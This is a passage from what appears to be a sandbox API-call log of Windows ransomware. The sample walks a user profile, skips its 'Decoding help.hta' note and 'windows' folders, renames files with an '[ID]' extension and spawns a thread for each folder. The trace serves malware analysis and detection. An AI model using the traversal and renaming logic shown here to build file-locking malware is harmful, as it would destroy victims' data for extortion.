lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" [0039.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decoding help.hta")) returned 0x1 [0039.369] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0039.369] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 55 [0039.369] lstrcmpiW (lpString1="[ID]", lpString2=".blf") returned 1 [0039.369] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.369] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0039.369] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0039.369] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.[ID]g9uZrLhJaygpwRm1[ID]" [0039.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.369] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0039.370] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.370] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" [0039.370] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decoding help.hta")) returned 0x1 [0039.370] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0039.370] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0039.370] lstrcmpiW (lpString1="[ID]", lpString2="s-ms") returned -1 [0039.370] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.370] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0039.370] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0039.370] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.[ID]g9uZrLhJaygpwRm1[ID]" [0039.370] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.370] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0039.370] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.370] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" [0039.370] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decoding help.hta")) returned 0x1 [0039.370] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0039.370] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0039.370] lstrcmpiW (lpString1="[ID]", lpString2="s-ms") returned -1 [0039.370] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.370] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0039.370] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0039.370] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.[ID]g9uZrLhJaygpwRm1[ID]" [0039.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.371] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0039.371] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.371] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.371] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" [0039.371] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decoding help.hta")) returned 0x1 [0039.371] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x101018d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x101018d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0039.371] lstrcmpW (lpString1=".", lpString2="Pictures") returned -1 [0039.371] lstrcmpW (lpString1="..", lpString2="Pictures") returned -1 [0039.371] lstrcmpiW (lpString1="windows", lpString2="Pictures") returned 1 [0039.372] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.372] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.373] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Pictures" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0039.373] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0039.373] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98b28b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.381] CloseHandle (hObject=0x1c4) returned 1 [0039.381] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0039.381] lstrcmpW (lpString1=".", lpString2="PrintHood") returned -1 [0039.381] lstrcmpW (lpString1="..", lpString2="PrintHood") returned -1 [0039.381] lstrcmpiW (lpString1="windows", lpString2="PrintHood") returned 1 [0039.383] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.383] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.383] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="PrintHood" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0039.383] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*" [0039.383] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.383] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98e2980, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0040.455] CloseHandle (hObject=0x1c4) returned 1 [0040.456] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0040.456] lstrcmpW (lpString1=".", lpString2="Recent") returned -1 [0040.456] lstrcmpW (lpString1="..", lpString2="Recent") returned -1 [0040.456] lstrcmpiW (lpString1="windows", lpString2="Recent") returned 1 [0040.457] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0040.458] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0040.458] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Recent" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0040.458] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*" [0040.458] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0040.458] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f3f378, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0040.458] CloseHandle (hObject=0x1c4) returned 1 [0040.459] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0040.459] lstrcmpW (lpString1=".", lpString2="Saved Games") returned -1 [0040.459] lstrcmpW (lpString1="..", lpString2="Saved Games") returned -1 [0040.459] lstrcmpiW (lpString1="windows", lpString2="Saved Games") returned 1 [0040.460] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0040.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0040.460] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Saved Games" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0040.461] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" [0040.461] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0040.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f573e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0040.461] CloseHandle (hObject=0x1c4) returned 1 [0040.461] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0040.462] lstrcmpW (lpString1=".", lpString2="Searches") returned -1 [0040.462] lstrcmpW (lpString1="..", lpString2="Searches") returned -1 [0040.462] lstrcmpiW (lpString1="windows", lpString2="Searches") returned 1 [0040.463] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0040.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0040.464] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Searches" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0040.464] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0040.464] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0040.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f6f448, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0040.464] CloseHandle (hObject=0x1c4) returned 1 [0040.465] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0040.465] lstrcmpW (lpString1=".", lpString2="SendTo") returned -1 [0040.465] lstrcmpW (lpString1="..", lpString2="SendTo") returned -1 [0040.465] lstrcmpiW (lpString1="windows", lpString2="SendTo") returned 1 [0040.466] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0040.466] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0040.467] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="SendTo" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") 